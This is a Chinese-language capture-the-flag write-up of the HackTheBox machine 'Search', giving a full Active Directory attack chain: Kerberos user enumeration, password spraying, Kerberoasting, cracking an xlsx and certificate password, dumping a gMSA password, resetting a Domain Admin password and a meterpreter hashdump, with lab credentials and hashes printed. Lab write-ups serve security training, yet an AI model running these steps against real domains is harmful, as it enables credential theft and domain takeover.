基本信息

端口扫描

域环境:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
$ nmap -sC -sV 10.10.11.129
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-24 14:47 CST
Nmap scan report for 10.10.11.129
Host is up (0.21s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Search — Just Testing IIS
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-01-24 06:49:48Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-01-24T06:51:10+00:00; 0s from scanner time.
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_ssl-date: 2022-01-24T06:51:10+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
| tls-alpn:
|_  http/1.1
|_http-title: Search — Just Testing IIS
| http-methods:
|_  Potentially risky methods: TRACE
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-01-24T06:51:10+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-01-24T06:51:10+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-01-24T06:51:10+00:00; 0s from scanner time.
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2022-01-24T06:50:34
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 198.79 seconds

80

about us里一些用户名,可以做成字典:

一张图片上提示信息:

1
2
send password to xxx
IsolationIsKey?

users.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Keely Lyons
Dax Santiago
Sierra Frye
Kyla Stewart
Kaiara Spencer
Dave Simpson
Ben Thompson
Chris Stewart
Keely.Lyons
Dax.Santiago
Sierra.Frye
Kyla.Stewart
Kaiara.Spencer
Dave.Simpson
Ben.Thompson
Chris.Stewar

Enum

userenum

根据用户名字典,枚举有效用户名:

1
2
3
4
5
./kerbrute_linux_amd64 userenum users.txt -d search.htb --dc 10.10.11.129

2022/01/20 10:47:33 >  [+] VALID USERNAME:	 Keely.Lyons@search.htb
2022/01/20 10:47:33 >  [+] VALID USERNAME:	 Dax.Santiago@search.htb
2022/01/20 10:47:33 >  [+] VALID USERNAME:	 Sierra.Frye@search.htb

smb

注意前面提示信息那张图,那个也是有效用户名,需要加到字典里,然后可以发现smb share:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
crackmapexec smb 10.10.11.129 -u users.txt -p 'IsolationIsKey?' --shares

SMB         10.10.11.129    445    RESEARCH         [+] search.htb\Hope.Sharp:IsolationIsKey?
SMB         10.10.11.129    445    RESEARCH         [+] Enumerated shares
SMB         10.10.11.129    445    RESEARCH         Share           Permissions     Remark
SMB         10.10.11.129    445    RESEARCH         -----           -----------     ------
SMB         10.10.11.129    445    RESEARCH         ADMIN$                          Remote Admin
SMB         10.10.11.129    445    RESEARCH         C$                              Default share
SMB         10.10.11.129    445    RESEARCH         CertEnroll      READ            Active Directory Certificate Services share
SMB         10.10.11.129    445    RESEARCH         helpdesk
SMB         10.10.11.129    445    RESEARCH         IPC$            READ            Remote IPC
SMB         10.10.11.129    445    RESEARCH         NETLOGON        READ            Logon server share
SMB         10.10.11.129    445    RESEARCH         RedirectedFolders$ READ,WRITE
SMB         10.10.11.129    445    RESEARCH         SYSVOL          READ            Logon server share

ldap

使用bloodhound通过ldap收集信息,需要加下hosts:

1
2
3
10.10.11.129 research.search.htb search.htb

bloodhound-python -u Hope.Sharp -p 'IsolationIsKey?' -ns 10.10.11.129 -d search.htb -c All

users

根据已有信息生成新的用户名字典:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
impacket-samrdump search.htb/Hope.Sharp:IsolationIsKey?@10.10.11.129

Administrator
Guest
krbtgt
Santino.Benjamin
Payton.Harmon
Trace.Ryan
Reginald.Morton
Eddie.Stevens
Cortez.Hickman
Chace.Oneill
Abril.Suarez
Savanah.Velazquez
Antony.Russo
Cameron.Melendez
Edith.Walls
Lane.Wu
Arielle.Schultz
Bobby.Wolf
Blaine.Zavala
Margaret.Robinson
Celia.Moreno
Kaitlynn.Lee
Kyler.Arias
Saniyah.Roy
Sarai.Boone
Jermaine.Franco
Alfred.Chan
Jamar.Holt
Sandra.Wolfe
Rene.Larson
Yareli.Mcintyre
Griffin.Maddox
Prince.Hobbs
Armando.Nash
Sonia.Schneider
Maeve.Mann
Lizeth.Love
Amare.Serrano
Savanah.Knox
Frederick.Cuevas
Marshall.Skinner
Edgar.Jacobs
Elisha.Watts
Belen.Compton
Amari.Mora
Cadence.Conner
Katelynn.Costa
Sage.Henson
Maren.Guzman
Natasha.Mayer
Chanel.Bell
Scarlett.Parks
Eliezer.Jordan
Dax.Santiago
Lillie.Saunders
Jayla.Roberts
Lorelei.Huang
Taniya.Hardy
Charlee.Wilkinson
Monique.Moreno
Desmond.Bonilla
Claudia.Sharp
Abbigail.Turner
Yaritza.Riddle
Tori.Mora
Hugo.Forbes
Jolie.Lee
German.Rice
Zain.Hopkins
Hope.Sharp
Kylee.Davila
Melanie.Santiago
Hunter.Kirby
Annabelle.Wells
Ada.Gillespie
Gunnar.Callahan
Aarav.Fry
Colby.Russell
Eve.Galvan
Jeramiah.Fritz
Cade.Austin
Keely.Lyons
Abby.Gonzalez
Joy.Costa
Vincent.Sutton
Cesar.Yang
Camren.Luna
Tyshawn.Peck
Keith.Hester
Braeden.Rasmussen
Angel.Atkinson
Sierra.Frye
Maci.Graves
Judah.Frye
Tristen.Christian
Crystal.Greer
Kayley.Ferguson
Haven.Summers
Isabela.Estrada
Kaylin.Bird
Angie.Duffy
Claudia.Pugh
Jordan.Gregory
web_svc
Tristan.Davies

Kerberoast

bloodhound可以发现两个 Kerberoastable账号,其中有一个web_svc是一个临时服务账号,这类账号一般易受攻击:

GetUserSPNs

直接用impacket自带的GetUserSPNs就能够获取到hash:

1
impacket-GetUserSPNs -request -dc-ip 10.10.11.129 search.htb/Hope.Sharp:IsolationIsKey?

hashcrack

破解出来密码:

1
@3ONEmillionbaby

Enum

使用得到的密码继续枚举,发现另一个用户复用这个密码:

1
2
3
crackmapexec smb 10.10.11.129 -u users3.txt -p '@3ONEmillionbaby' --continue-on-success

SMB         10.10.11.129    445    RESEARCH         [+] search.htb\Edgar.Jacobs:@3ONEmillionbaby

smb

使用这个账号继续查看smb share,发现一个xlsx:

1
2
3
4
smbclient //search.htb/RedirectedFolders$ -U edgar.jacobs

cd edgar.jacobs\Desktop\
 get Phishing_Attempt.xlsx

可以看到有隐藏列,没有显示C:

xlsx

xlsx就是压缩文件,可以直接解压,删除其中的sheetProtection:

1
2
3
4
5
6
7
unzip Phishing_Attempt.xlsx

xl/worksheets/sheet2.xml

<sheetProtection algorithmName="SHA-512" hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg==" saltValue="U9oZfaVCkz5jWdhs9AA8nA==" spinCount="100000" sheet="1" objects="1" scenarios="1"/>

zip -r Phishing.xlsx .

然后我们能够得到大概是内部钓鱼演练获取到的密码:

user flag

根据bloodhound分析结果,Sierra.Frye和Abby.Gonzalez在到域控的攻击路径中,用Sierra.Frye对应密码访问smb ,得到user.txt:

1
2
3
4
smbclient //search.htb/RedirectedFolders$ -U Sierra.Frye
cd sierra.frye
cd desktop
get user.txt

certificate

downloads目录里backup可以发现证书文件:

尝试导入浏览器,需要密码:

staff

简单的目录扫描可以知道staff是需要证书访问的:

p12tool

破解出来密码(比较费时间):

1
2
3
./p12tool crack -c ../staff.pfx -f ~/Tools/dict/rockyou.txt

misspissy

powershell

导入证书,使用账号密码登录,访问到powershell console:

GMSA

sierra.frye属于ITSEC组,有权限ReadGMSAPassword

1
2
3
4
$ python3 gMSADumper.py -d search.htb -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18'
Users or groups who can read password for BIR-ADFS-GMSA$:
 > ITSec
BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f

BIR-ADFS-GMSA$

gmsa密码理论上不可破解,所以可以通过powershell直接复用:

1
2
3
4
5
6
$user = 'BIR-ADFS-GMSA$'
$gmsa = Get-ADServiceAccount -Identity $user -Properties 'msDS-ManagedPassword'
$blob = $gmsa.'msDS-ManagedPassword'
$mp = ConvertFrom-ADManagedPasswordBlob $blob
$cred = New-Object System.Management.Automation.PSCredential $user,$mp.SecureCurrentPassword
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}

Domain Admin & root.txt

BIR-ADFS-GMSA对Tristan.Davies有Generic all权限,而Tristan.Davies是domain admin:

所以可以直接修改Tristan.Davies的密码后登录

1
2
3
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {net user Tristan.Davies miao@1234 /domain}

impacket-wmiexec -dc-ip 10.10.11.129 search.htb/Tristan.Davies@10.10.11.129

hashdump

已有shell加载meterpreter,hashdump:

1
2
3
4
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:cd69d23e4383daa5b0f42d29dba9529a:::
...

参考资料